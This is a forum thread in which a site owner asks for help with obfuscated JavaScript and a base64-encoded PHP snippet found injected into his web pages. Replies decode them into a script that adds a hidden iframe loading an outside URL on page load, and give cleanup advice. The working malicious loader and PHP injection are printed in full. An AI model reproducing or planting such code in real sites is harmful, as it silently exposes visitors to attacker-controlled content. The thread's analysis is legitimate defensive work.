LinuxQuestions.org - [SOLVED] Strange script on FTP?

- Programming (https://www.linuxquestions.org/questions/programming-9/)

- - Strange script on FTP? (https://www.linuxquestions.org/questions/programming-9/strange-script-on-ftp-4175438161/)

Strange script on FTP?

Hello everyone,

I discovered a strange code/script/whatever on my FTP, it was added to my index.html. I think this is a pretty bad malware script (since as well chrome as well as my antivirus software absolutely do not like it), and I also think that all those numbers included can be "translated" or "decoded". I also tried googleing for a ANSII converter, but I couldnt translate it. Can you guys help me out?

Thanks in advance,

Lukas

Code:

<!--c3284d--><script>try{1-prototype;}catch(asd){x=2;}

if(x){fr="fromChar";f=[4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92,59,97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,102,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,105,112,98,90,37,98,90,93,106,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,103,90,22,21,52,22,23,95,106,105,103,48,36,38,99,94,90,94,86,92,98,98,88,112,106,105,36,99,92,106,36,111,99,97,37,102,93,103,24,48,4,0,94,93,104,98,37,95,89,23,51,21,30,92,103,100,63,89,30,49,2,1,90,100,90,107,98,92,100,105,37,88,100,91,111,35,88,102,101,92,100,89,58,94,94,99,90,29,96,92,103,100,31,48,4,0,114,50,3,-1,110,95,99,91,101,108,37,101,99,99,101,86,91,22,50,23,92,103,100,55,89,91,49,2,1];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");zx=fr+z;for(i=0;286-5+5-i>0;i+=1){j=i;if(e)s=s+r[zx]((w[j]*1+(9+e("j%3"))));}

if(x&&f&&012===10)e(s);</script><!--/c3284d-->

And if you have any further information on what do do, please feel free to reply or send me a pm. This is very urgent for me so please, please help!!!

Basically it places an ad on your site. It runs a JavaScript it will create a iframe with an URL containing the ad.

Hi.

Here is almost equivalent python script with less obfuscation:

Code:

f = [4, 0, 91, 108, 100, 88, 107, 95, 100, 101, 22, 91, 105, 99, 54, 91, 90,

      29, 32, 22, 112, 4, 0, 107, 88, 104, 21, 96, 92, 103, 100, 22, 50, 23,

      90, 100, 90, 107, 98, 92, 100, 105, 37, 89, 103, 92, 87, 105, 92, 59,

      97, 92, 99, 90, 101, 106, 29, 30, 95, 91, 105, 87, 98, 92, 29, 30, 50,

      3, -1, 96, 92, 103, 100, 36, 104, 107, 111, 97, 92, 36, 101, 102, 105,

      94, 107, 95, 100, 101, 51, 28, 88, 88, 104, 102, 98, 106, 107, 91, 28,

      50, 3, -1, 96, 92, 103, 100, 36, 104, 107, 111, 97, 92, 36, 105, 102,

      102, 50, 30, 35, 46, 48, 47, 90, 100, 29, 48, 4, 0, 94, 93, 104, 98,

      37, 105, 105, 112, 98, 90, 37, 98, 90, 93, 106, 50, 30, 35, 46, 48, 47,

      90, 100, 29, 48, 4, 0, 94, 93, 104, 98, 37, 105, 103, 90, 22, 21, 52,

      22, 23, 95, 106, 105, 103, 48, 36, 38, 99, 94, 90, 94, 86, 92, 98, 98,

      88, 112, 106, 105, 36, 99, 92, 106, 36, 111, 99, 97, 37, 102, 93, 103,

      24, 48, 4, 0, 94, 93, 104, 98, 37, 95, 89, 23, 51, 21, 30, 92, 103,

      100, 63, 89, 30, 49, 2, 1, 90, 100, 90, 107, 98, 92, 100, 105, 37, 88,

      100, 91, 111, 35, 88, 102, 101, 92, 100, 89, 58, 94, 94, 99, 90, 29,

      96, 92, 103, 100, 31, 48, 4, 0, 114, 50, 3, -1, 110, 95, 99, 91, 101,

      108, 37, 101, 99, 99, 101, 86, 91, 22, 50, 23, 92, 103, 100, 55, 89,

      91, 49, 2, 1];



s = ""

for i in range(286):

        s += chr(f[i] + 9 + i % 3)



print s

and here is the result:

Code:



function frmAdd() {

var ifrm = document.createElement('iframe');

ifrm.style.position='absolute';

ifrm.style.top='-999em';

ifrm.style.left='-999em';

ifrm.src  = "http://michaelmazur.net/xml.php";

ifrm.id = 'frmId';

document.body.appendChild(ifrm);

};

window.onload = frmAdd;

This script gets evaluated.

Here is how to decode it. :)

Thanks already!

But now, is that a good thing or a bad thing?

Also, I found this in my include.php page:

Code:

#c3284d#

echo(gzinflate(base64_decode("nVTbjtowEH3vZ1gqShqjenwJcb3ePuwn9BHxgCDpBrUblETAgvj3zozDboVUVS0SEM/1nDnjPAybvt2Pj2P/eoH5vu/Gbnzd1+G6WY+b52w9bPPLKepw/dA22Sm/NH0UTd/9fHpe9yI0cWmlkh4kqAq/Slb0t5De8QkUSK2T30nvpbN08EpqL40mH4CWVIOyONlKjRGl9OhThstgmMNfQ4l09incVylIcXWD+Z5T0FgtUkdM9NIv6AG7+4QIVMn9FcGcsFW3csmB7Yyc3+MwJeOj3gAw1WUjFdGppb0fgMMZVMRtokeRvmIUHMnuf23opoY8GQRsnLSltJW0i9uUkAmdSR+cuuFK2NcspnTHsyfWiozpgePK/y/KGqFeqKFjfUk1N5FNAZiPFEzFilhuamXFvAlDmhPotxwMpshkIPI0CVaVu+oEw0ht/wQNAeBqIBKSAlj49xmXhpxosxgi4a87lvac1gZx4ITYoFnpKRLLuYpB2GnrcGp3wsINK4B9Ex8graRPW5luFZNMjD0/0ajgtzvxXtUxT3QmKqtwiKI+rEW44uU95HU8ti/b7rg8FOKHWIVjbMIQl6vQx29j3758D+eYZXX+VTx121p8ESIP51Ns+uIcmq7P2qiCrsq5K9y8fVShLSLkl11sA5av8yEORb88n1ZZdlzuVp+gyHxRZ2L30YgcP9M7ZDZrZjMFOsYIKq+zIQ8Pn6e30C8=")));

#/c3284d#

I tried to decode it via google'ing for a base64 decoder, but couldn't get a good decoding :(. What does this thing do?

Hi.

Uncompressing gives the same script:

Code:

<script>try{1-prototype;}catch(asd){x=2;}

if(x){fr="fromChar";f=[4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92,59,97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,102,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,105,112,98,90,37,98,90,93,106,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,103,90,22,21,52,22,23,95,106,105,103,48,36,38,99,94,90,94,86,92,98,98,88,112,106,105,36,99,92,106,36,111,99,97,37,102,93,103,24,48,4,0,94,93,104,98,37,95,89,23,51,21,30,92,103,100,63,89,30,49,2,1,90,100,90,107,98,92,100,105,37,88,100,91,111,35,88,102,101,92,100,89,58,94,94,99,90,29,96,92,103,100,31,48,4,0,114,50,3,-1,110,95,99,91,101,108,37,101,99,99,101,86,91,22,50,23,92,103,100,55,89,91,49,2,1];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");zx=fr+z;for(i=0;286-5+5-i>0;i+=1){j=i;if(e)s=s+r[zx]((w[j]*1+(9+e("j%3"))));}

if(x&&f&&012===10)e(s);</script>

Quote:

Originally Posted by LukasH (Post 4834254)

is that a good thing or a bad thing?

Bad. Basically somebody exploited a loophole to inject ads in whatever you run. Both goossen and firstfire should have followed up by pointing that out. BTW uploading via FTP is a real classic one but it may not be the only infection vector. Cleaning up your include and rendered pages will not be enough. Find out where you run things (home, shared hosting, VPS, etc), what you run (CMS, web log, statistics, 3rd party plugins) and their versions (either current and maintained or obsolete, deprecated) plus check service access via SSH and obviously FTP.

Umm. I would then prefer just to clean up the files that are infected with that evil, evil bastard, clean up the complete server and renew some passwords, and then get the files back up and running.

If that is not a good idea, please prevent me from doing that by giving a quick answer ;). Thanks !